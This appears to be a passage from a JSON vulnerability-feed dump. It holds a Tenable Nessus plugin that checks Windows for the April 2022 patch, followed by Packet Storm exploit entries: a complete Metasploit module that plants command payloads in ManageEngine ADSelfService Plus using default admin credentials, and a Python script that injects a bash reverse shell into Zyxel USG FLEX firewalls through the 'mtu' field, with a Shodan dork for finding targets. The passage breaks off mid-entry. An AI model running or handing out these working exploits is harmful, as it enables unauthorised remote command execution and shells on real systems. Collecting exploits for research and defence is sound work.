"CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26791", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012599.NASL", "href": "https://www.tenable.com/plugins/nessus/159685", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159685);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-22009\",\n \"CVE-2022-23257\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24488\",\n \"CVE-2022-24489\",\n \"CVE-2022-24490\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24537\",\n \"CVE-2022-24538\",\n \"CVE-2022-24539\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24546\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26783\",\n \"CVE-2022-26784\",\n \"CVE-2022-26785\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26789\",\n \"CVE-2022-26790\",\n \"CVE-2022-26791\",\n \"CVE-2022-26792\",\n \"CVE-2022-26793\",\n \"CVE-2022-26794\",\n \"CVE-2022-26795\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26811\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26816\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26823\",\n \"CVE-2022-26824\",\n \"CVE-2022-26825\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26828\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26914\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\",\n \"CVE-2022-26920\"\n );\n script_xref(name:\"MSKB\", value:\"5012599\");\n script_xref(name:\"MSFT\", value:\"MS22-5012599\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012599: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26789, CVE-2022-26786, CVE-2022-26802,\n CVE-2022-26803, CVE-2022-26801, CVE-2022-26796,\n CVE-2022-26787, CVE-2022-26797, CVE-2022-26827,\n CVE-2022-26810, CVE-2022-26808, CVE-2022-26798,\n CVE-2022-24549, CVE-2022-26795, CVE-2022-26791, \n CVE-2022-26794, CVE-2022-26904, CVE-2022-26792,\n CVE-2022-26807, CVE-2022-26788, CVE-2022-26828, \n CVE-2022-26790, CVE-2022-26914, CVE-2022-26793, \n CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, \n CVE-2022-24489, CVE-2022-24488, CVE-2022-24486, \n CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, \n CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, \n CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, \n CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831, \n CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, \n CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26917, \n CVE-2022-26916, CVE-2022-26812, CVE-2022-26811, \n CVE-2022-26919, CVE-2022-26823, CVE-2022-26809, \n CVE-2022-26824, CVE-2022-26818, CVE-2022-26815, \n CVE-2022-26814, CVE-2022-26822, CVE-2022-26918, \n CVE-2022-26829, CVE-2022-26820, CVE-2022-26826, \n CVE-2022-26819, CVE-2022-26825, CVE-2022-26817, \n CVE-2022-26821, CVE-2022-26813, CVE-2022-24545, \n CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, \n CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, \n CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, \n CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, \n CVE-2022-23257, CVE-2022-21983, CVE-2022-22009, \n CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26816, CVE-2022-26920, \n CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, \n CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, \n CVE-2022-24483)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012591\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012599\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012599'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:19042,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012599])\n|| smb_check_rollup(os:'10',\n sp:0,\n os_build:19043,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012599])\n|| smb_check_rollup(os:'10',\n sp:0,\n os_build:19044,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012599])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-04-21T15:28:21", "description": "", "cvss3": {}, "published": "2022-04-21T00:00:00", "type": "packetstorm", "title": "ManageEngine ADSelfService Plus Custom Script Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-28810"], "modified": "2022-04-21T00:00:00", "id": "PACKETSTORM:166816", "href": "https://packetstormsecurity.com/files/166816/ManageEngine-ADSelfService-Plus-Custom-Script-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ManageEngine ADSelfService Plus Custom Script Execution', \n'Description' => %q{ \nThis module exploits the \"custom script\" feature of ADSelfService Plus. The \nfeature was removed in build 6122 as part of the patch for CVE-2022-28810. \nFor purposes of this module, a \"custom script\" is arbitrary operating system \ncommand execution. \n \nThis module uses an attacker provided \"admin\" account to insert the malicious \npayload into the custom script fields. When a user resets their password or \nunlocks their account, the payload in the custom script will be executed. \nThe payload will be executed as SYSTEM if ADSelfService Plus is installed as \na service, which we believe is the normal operational behavior. \n \nThis is a passive module because user interaction is required to trigger the \npayload. This module also does not automatically remove the malicious code from \nthe remote target. Use the \"TARGET_RESET\" operation to remove the malicious \ncustom script when you are done. \n \nADSelfService Plus uses default credentials of \"admin\":\"admin\" \n}, \n'Author' => [ \n# Discovered and exploited by unknown threat actors \n'Jake Baines', # Analysis, CVE credit, and Metasploit module \n'Hernan Diaz', # Analysis and CVE credit \n'Andrew Iwamaye', # Analysis and CVE credit \n'Dan Kelley' # Analysis and CVE credit \n], \n'References' => [ \n['CVE', '2022-28810'], \n['URL', 'https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html'], \n['URL', 'https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/'] \n], \n'DisclosureDate' => '2022-04-09', \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => ARCH_CMD, \n'Privileged' => true, # false if ADSelfService Plus is not run as a service \n'Stance' => Msf::Exploit::Stance::Passive, \n'Targets' => [ \n[ \n'Windows Command', \n{ \n'Arch' => ARCH_CMD, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/jjs_reverse_tcp' \n} \n} \n], \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8888, \n'DisablePayloadHandler' => true, \n'JJS_PATH' => '..\\\\jre\\\\bin\\\\jjs.exe' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/']), \nOptString.new('USERNAME', [true, 'The administrator username', 'admin']), \nOptString.new('PASSWORD', [true, 'The administrator user\\'s password', 'admin']), \nOptBool.new('TARGET_RESET', [true, 'On the target, disables custom scripts and clears custom script field', false]) \n]) \nend \n \n## \n# Because this is an authenticated vulnerability, we will rely on a version string \n# for the check function. We can extract the version (or build) from selfservice/index.html. \n## \ndef check \nres = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/selfservice/index.html')) \nunless res \nreturn CheckCode::Unknown('The target failed to respond to check.') \nend \n \nunless res.code == 200 \nreturn CheckCode::Safe('Failed to retrieve /selfservice/index.html') \nend \n \nver = res.body[/\\.css\\?buildNo=(?<build_id>[0-9]+)/, :build_id] \nif ver.nil? \nreturn CheckCode::Safe('Could not extract a version number') \nend \n \nif Rex::Version.new(ver) < Rex::Version.new('6122') \nreturn CheckCode::Appears(\"This determination is based on the version string: #{ver}.\") \nend \n \nCheckCode::Safe(\"This determination is based on the version string: #{ver}.\") \nend \n \n## \n# Authenticate with the remote target. Login requires four steps: \n# \n# 1. Grab a CSRF token \n# 2. Post credentials to /ServletAPI/accounts/login \n# 3. Post credentials to /j_security_check \n# 4. Grab another CSRF token for authenticated requests \n# \n# @return a new CSRF token to use with authenticated requests \n## \ndef authenticate \n# grab a CSRF token from the index \nres = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do') }) \nfail_with(Failure::Unreachable, 'The target did not respond') unless res \nfail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['HttpOnly, adscsrf'].empty? \ncsrf_tok = res.get_cookies_parsed['HttpOnly, adscsrf'].to_s[/HttpOnly, adscsrf=(?<token>[0-9a-f-]+); path=/, :token] \nfail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok \n \n# send the first login request to get the ssp token \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/ServletAPI/accounts/login'), \n'keep_cookies' => true, \n'vars_post' => \n{ \n'loginName' => datastore['USERNAME'], \n'domainName' => 'ADSelfService Plus Authentication', \n'j_username' => datastore['USERNAME'], \n'j_password' => datastore['PASSWORD'], \n'AUTHRULE_NAME' => 'ADAuthenticator', \n'adscsrf' => csrf_tok \n} \n}) \nfail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200 \n \n# send the second login request to get the sso token \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/j_security_check'), \n'keep_cookies' => true, \n'vars_post' => \n{ \n'loginName' => datastore['USERNAME'], \n'domainName' => 'ADSelfService Plus Authentication', \n'j_username' => datastore['USERNAME'], \n'j_password' => datastore['PASSWORD'], \n'AUTHRULE_NAME' => 'ADAuthenticator', \n'adscsrf' => csrf_tok \n} \n}) \nfail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 302 \n \n# revisit authorization.do to complete authentication \nres = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do'), 'keep_cookies' => true }) \nfail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['adscsrf'].empty? \ncsrf_tok = res.get_cookies_parsed['adscsrf'].to_s[/adscsrf=(?<token>[0-9a-f-]+);/, :token] \nfail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok \n \nprint_good('Authentication successful') \ncsrf_tok \nend \n \n## \n# Triggering the payload requires user interaction. Using the default payload \n# handler will cause this module to exit after planting the payload, so the \n# module will spawn it's own handler so that it doesn't exit until a shell \n# has been received/handled. Note that this module is passive so it should \n# just be chilling quietly in the background. \n# \n# This code is largely copy/paste from windows/local/persistence.rb \n## \ndef create_multihandler(lhost, lport, payload_name) \npay = framework.payloads.create(payload_name) \npay.datastore['LHOST'] = lhost \npay.datastore['LPORT'] = lport \nprint_status('Starting exploit/multi/handler') \n \n# Set options for module \nmh = framework.exploits.create('multi/handler') \nmh.share_datastore(pay.datastore) \nmh.datastore['PAYLOAD'] = payload_name \nmh.datastore['EXITFUNC'] = 'thread' \nmh.datastore['ExitOnSession'] = true \n# Validate module options \nmh.options.validate(mh.datastore) \n# Execute showing output \nmh.exploit_simple( \n'Payload' => mh.datastore['PAYLOAD'], \n'LocalInput' => user_input, \n'LocalOutput' => user_output, \n'RunAsJob' => true \n) \n \n# Check to make sure that the handler is actually valid \n# If another process has the port open, then the handler will fail \n# but it takes a few seconds to do so. The module needs to give \n# the handler time to fail or the resulting connections from the \n# target could end up on on a different handler with the wrong payload \n# or dropped entirely. \nRex.sleep(5) \nreturn nil if framework.jobs[mh.job_id.to_s].nil? \n \nreturn mh.job_id.to_s \nend \n \n# The json policy blob that ADSSP provides us is not accepted by ADSSP \n# if we try to POST it back. Specifically, ADSP is very unhappy about all \n# the booleans using \"true\" or \"false\" instead of \"1\" or \"0\" *except* for \n# HIDE_CAPTCHA_RPUA which has to remain a boolean. Sounds unbelievable, but \n# here we are. \ndef fix_adssp_json(json_hash) \njson_hash.map do |key, value| \nif value.is_a? Hash \n[key, fix_adssp_json(value)] \nelsif value.is_a? Array \nvalue = value.map do |array_val| \nif array_val.is_a? Hash \narray_val = fix_adssp_json(array_val) \nend \narray_val \nend \n[key, value] \nelsif key == 'HIDE_CAPTCHA_RPUA' \n[key, value] \nelsif value.is_a? TrueClass \n[key, 1] \nelsif value.is_a? FalseClass \n[key, 0] \nelse \n[key, value] \nend \nend.to_h \nend \n \ndef exploit \ncsrf_tok = authenticate \n \n# Grab the list of configured policies \npolicy_list_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getPolicyConfigDetails') \nprint_status(\"Requesting policy list from #{policy_list_uri}\") \nres = send_request_cgi({ 'method' => 'GET', 'uri' => policy_list_uri }) \nfail_with(Failure::UnexpectedReply, 'Log in attempt failed') unless res.code == 200 \npolicy_json = res.get_json_document \nfail_with(Failure::UnexpectedReply, \"The target didn't return a JSON body\") if policy_json.nil? \npolicy_details_json = policy_json['POLICY_DETAILS'] \nfail_with(Failure::UnexpectedReply, \"The target didn't have any configured policies\") if policy_details_json.nil? \n \n# There can be multiple policies. This logic will loop over each one, grab the configuration \n# details, update the configuration to include our payload, and then POST it back. \npolicy_details_json.each do |policy_entry| \npolicy_id = policy_entry['POLICY_ID'] \npolicy_name = policy_entry['POLICY_NAME'] \nfail_with(Failure::UnexpectedReply, 'Policy details missing name or id') if policy_id.nil? || policy_name.nil? \n \nprint_status(\"Requesting policy details for #{policy_name}\") \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getAPCDetails'), \n'vars_get' => \n{ \n'POLICY_ID' => policy_id \n} \n}) \nfail_with(Failure::UnexpectedReply, 'Acquiring specific policy details failed') unless res.code == 200 \n \n# load the JSON and insert (or remove) our payload \nspecific_policy_json = res.get_json_document \nfail_with(Failure::UnexpectedReply, \"The target didn't return a JSON body\") if specific_policy_json.nil? \nfail_with(Failure::UnexpectedReply, \"The target didn't contain the expected JSON\") if specific_policy_json['SCRIPT_COMMAND_RESET'].nil? \nnew_payload = \"cmd.exe /c #{payload.encoded}\" \n \nif datastore['TARGET_RESET'] \nprint_status('Disabling custom script functionality') \nspecific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '0' \nspecific_policy_json['SCRIPT_COMMAND_RESET'] = '' \nspecific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '0' \nspecific_policy_json['SCRIPT_COMMAND_UNLOCK'] = '' \nelse \nprint_status('Enabling custom scripts and inserting the payload') \nspecific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '1' \nspecific_policy_json['SCRIPT_COMMAND_RESET'] = new_payload \nspecific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '1' \nspecific_policy_json['SCRIPT_COMMAND_UNLOCK'] = new_payload \nend \n \n# fix up the ADSSP provided json so ADSSP will accept it o.O \nupdated_policy = fix_adssp_json(specific_policy_json).to_json \n \npolicy_update_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/setAPCDetails') \nprint_status(\"Posting updated policy configuration to #{policy_update_uri}\") \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => policy_update_uri, \n'vars_post' => \n{ \n'APC_SETTINGS_DETAILS' => updated_policy, \n'POLICY_NAME' => policy_name, \n'adscsrf' => csrf_tok \n} \n}) \nfail_with(Failure::UnexpectedReply, 'Policy update request failed') unless res.code == 200 \n \n# spawn our own payload handler? \nif !datastore['TARGET_RESET'] && datastore['DisablePayloadHandler'] \nlistener_job_id = create_multihandler(datastore['LHOST'], datastore['LPORT'], datastore['PAYLOAD']) \nif listener_job_id.blank? \nprint_error(\"Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.\") \nend \nelse \nprint_good('Done!') \nend \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/166816/manageengine_adselfservice_plus_cve_2022_28810.rb.txt"}, {"lastseen": "2022-06-03T16:26:23", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "packetstorm", "title": "Zyxel USG FLEX 5.21 Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-03T00:00:00", "id": "PACKETSTORM:167372", "href": "https://packetstormsecurity.com/files/167372/Zyxel-USG-FLEX-5.21-Command-Injection.html", "sourceData": "`# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection \n# Shodan Dork: title:\"USG FLEX 100\" title:\"USG FLEX 100W\" title:\"USG FLEX 200\" title:\"USG FLEX 500\" title:\"USG FLEX 700\" title:\"USG20-VPN\" title:\"USG20W-VPN\" title:\"ATP 100\" title:\"ATP 200\" title:\"ATP 500\" title:\"ATP 700\" title:\"ATP 800\" \n# Date: May 18th 2022 \n# Exploit Author: Valentin Lobstein \n# Vendor Homepage: https://www.zyxel.com \n# Version: ZLD5.00 thru ZLD5.21 \n# Tested on: Linux \n# CVE: CVE-2022-30525 \n \n \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nimport sys \nimport json \nimport base64 \nimport requests \nimport argparse \n \n \nparser = argparse.ArgumentParser( \nprog=\"CVE-2022-30525.py\", \ndescription=\"Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444\", \n) \nparser.add_argument(\"-u\", dest=\"url\", help=\"Specify target URL\") \nparser.add_argument(\"-r\", dest=\"host\", help=\"Specify Remote host\") \nparser.add_argument(\"-p\", dest=\"port\", help=\"Specify Remote port\") \n \nargs = parser.parse_args() \n \nbanner = ( \n\"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7\" \n\"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg\" \n\"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg\" \n\"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8\" \n\"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg\" \n\"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n\" \n\"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp\" \n\"biA6KSApCg==\" \n) \n \n \ndef main(): \n \nprint(\"\\n\" + base64.b64decode(banner).decode(\"utf-8\")) \n \nif None in vars(args).values(): \nprint(f\"[!] Please enter all parameters !\") \nparser.print_help() \nsys.exit() \n \nif \"http\" not in args.url: \nargs.url = \"https://\" + args.url \nargs.url += \"/ztp/cgi-bin/handler\" \nexploit(args.url, args.host, args.port) \n \n \ndef exploit(url, host, port): \nheaders = { \n\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0\", \n\"Content-Type\": \"application/json\", \n} \n \ndata = { \n\"command\": \"setWanPortSt\", \n\"proto\": \"dhcp\", \n\"port\": \"4\", \n\"vlan_tagged\": \"1\", \n\"vlanid\": \"5\", \n\"mtu\": f'; bash -c \"exec bash -i &>/dev/tcp/{host}/{port}<&1;\";', \n\"data\": \"hi\", \n} \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nprint(f\"\\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}\") \n \ntry: \nresponse = requests.post( \nurl=url, headers=headers, data=json.dumps(data), verify=False, timeout=5 \n) \nexcept (KeyboardInterrupt, requests.exceptions.Timeout): \nprint(\"[!] Bye Bye hekcer !\") \nsys.exit(1) \nfinally: \n \ntry: \nprint(\"[!] Can't exploit the target ! Code :\", response.status_code) \n \nexcept: \nprint(\"[!] Enjoy your shell !!!\") \n \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167372/zyxelusgflex521-exec.txt"}, {"lastseen": "2022-05-16T15:02:03", "description": "", "cvss3": {}, "published": "2022-05-16T00:00:00", "type": "packetstorm", "title": "Zyxel Firewall ZTP Unauthenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-16T00:00:00", "id": "PACKETSTORM:167182", "href": 